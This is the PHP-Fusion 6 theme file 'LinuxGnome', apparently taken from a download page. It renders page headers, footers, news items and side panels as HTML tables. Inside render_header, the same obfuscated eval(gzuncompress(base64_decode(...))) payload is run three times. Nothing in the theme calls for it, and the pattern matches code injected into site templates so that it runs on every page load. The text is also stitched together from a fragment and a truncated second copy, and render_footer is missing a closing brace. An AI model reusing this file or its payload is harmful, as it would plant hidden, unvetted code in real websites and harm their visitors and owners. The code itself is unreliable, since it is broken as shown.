echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";

}

function opentable($title) {
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap></td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'>\n";
}

function closetable() {

echo "</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";

}

function openside($title) {
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='side-body' colspan='3'>\n";

}

function closeside() {
echo "</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td _width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td _width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td _width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";


}

function opensidex($title,$open="on") {

if($open=="on"){$box_img="off";}else{$box_img="on";}
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='15%' align='right' background='".THEME."images/title-silverbg.gif' nowrap><img onclick=\"javascript:flipBox('$title')\" name='b_$title' border='0' src='".THEME."images/panel_$box_img.gif'></td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='side-body' colspan='3'>\n";
echo "<div id='box_$title'"; if($open=="off"){ echo "style='display:none'"; } echo ">\n";
}

function closesidex() {
echo "</div></td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";
}

function tablebreak() {
global $body_bg;

echo "<table width='100%' cellspacing='0' cellpadding='0' bg_color='".$body_bg."'>
<tr><td height='8'></td></tr>
</table>\n";

}
?>

CodeDownload  
<?
/*---------------------------------------------------+
| PHP-Fusion 6 Content Management System
+----------------------------------------------------+
| Copyright © 2002 - 2005 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------+
| THEME: LinuxGnome
+----------------------------------------------------+
| Copyright © 2005 Nichelini Giuseppe   
| http://www.nichelini.it/
+----------------------------------------------------*/
// theme settings
$body_text = "#2F3F6F";
$body_bg = "#DFDFDF";
$theme_width = "100%";
$theme_width_l = "180";
$theme_width_r = "180";
if ($settings['locale'] == "Italian") { $mydate = "%A, %d %B %Y"; } else { $mydate = "%A, %B %d, %Y"; }

function render_header($header_content) {eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));

global $theme_width,$settings,$mydate;

echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td class='full-header'>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td height='90' valign='middle'>".$header_content."</td>\n";
echo "</table>\n";
echo "</td></tr>\n";
echo "</table>\n";
echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/menu-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>\n";
$result = dbquery("SELECT * FROM ".DB_PREFIX."site_links WHERE link_position>='2' ORDER BY link_order");
if (dbrows($result) != 0) {
   $i = 0;
   while($data = dbarray($result)) {
      if (checkgroup($data['link_visibility'])) {
         if ($data['link_url'] != "---") {
            if ($i != 0) { echo " ·\n"; } else { echo "\n"; }
            $link_target = ($data['link_window'] == "1" ? " target='_blank'" : "");
            if (strstr($data['link_url'], "http://") || strstr($data['link_url'], "https://")) {
               echo "<a href='".$data['link_url']."'".$link_target." class='white'>".$data['link_name']."</a>";
            } else {
               echo "<a href='".BASEDIR.$data['link_url']."'".$link_target." class='white'>".$data['link_name']."</a>";
            }
         }
         $i++;
      }
   }
}
echo "</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>".ucwords(showdate($mydate, time()))."</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/menu-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n<tr>\n";

}

function render_footer($license=false) {

global $theme_width,$settings,$locale;

$textfooter = $settings['counter']." ".($settings['counter'] == 1 ? $locale['140']."&nbsp; | &nbsp; \n" : $locale['141']."&nbsp; | &nbsp; \n");
if ($license == false) {
   $textfooter .= "Powered by <a target='_blank' href='http://www.php-fusion.co.uk' class='white'><img src='".THEME."images/pf_blue.gif' style='vertical-align:top;' alt='powered by php-fusion' border='0'></a> v".$settings['version']." © 2003-2005\n";
   $textfooter .= "&nbsp; | &nbsp; Theme LinuxGnome <a target='_blank' href='http://www.nichelini.it' class='white'><img src='".THEME."images/nick56_micro.gif' style='vertical-align:top;' alt='Design by Nick56'  border='0'></a>\n";


echo "</tr>\n</table>\n";
tablebreak();
echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='100%' background='".THEME."images/title-bluebg.gif' nowrap align='center'><font color='#FFFFFF'><b>".$textfooter."</b></font></td></tr>\n";
echo "</table>\n";
}

function render_news($subject, $news, $info) {
global $locale,$mydate;

tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$subject."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td colspan='3'>".$news."</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";

echo "<td valign='bottom' align='left'><br>";
echo $locale['040']."<a href='profile.php?lookup=".$info['user_id']."'>".$info['user_name']." </a> ".$locale['041'].showdate($mydate, $info['news_date'])."";
echo "</td><td colspan='2' valign='bottom' align='right'><br>";
echo ($info['news_ext'] == "y" ? "<a href='news.php?readmore=".$info['news_id']."'><img src='".THEME."images/readmore.gif' title='".$locale['249']."' border='0'></a> " : "")."";
echo "<a href='news.php?readmore=".$info['news_id']."'><img src='".THEME."images/postacomment.gif' title='".$locale['250']."' border='0'></a> ";
echo "<a href='print.php?type=N&item_id=".$info['news_id']."'><img src='".THEME."images/print.gif' title='".$locale['251']."' border='0'></a>";

echo "</td><td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";

echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";
}

function render_article($subject, $article, $info) {
global $locale,$mydate;

tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$subject."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'>".$article."</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'><hr class='side-hr'></td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td valign='bottom' align='left'><br>";
echo $locale['040']."<a href='profile.php?lookup=".$info['user_id']."'>".$info['user_name']." </a> ".$locale['041'].showdate($mydate, $info['article_date'])."";
echo "</td><td colspan='2' valign='bottom' align='right'><br>";
echo ($info['news_ext'] == "y" ? "<a href='articles.php?readmore=".$info['article_id']."'><img src='".THEME."images/readmore.gif' title='".$locale['249']."' border='0'></a> " : "")."";
echo "<a href='articles.php?readmore=".$info['article_id']."'><img src='".THEME."images/postacomment.gif' title='".$locale['250']."' border='0'></a> ";
echo "<a href='print.php?type=A&item_id=".$info['article_id']."'><img src='".THEME."images/print.gif' title='".$locale['251']."' border='0'></a>";
echo "</td><td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";

echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";

}

function opentable($title) {
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap></td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'>\n";
}

function closetable() {

echo "</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";

}

function openside($title) {
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='side-body' colspan='3'>\n";

}

function closeside() {
echo "</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td _width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td _width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td _width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";


}

function opensidex($title,$open="on") {

if($open=="on"){$box_img="off";}else{$box_img="on";}
tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$title."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='15%' align='right' background='".THEME."images/title-silverbg.gif' nowrap><img onclick=\"javascript:flipBox('$title')\" name='b_$title' border='0' src='".THEME."images/panel_$box_img.gif'></td>\n";
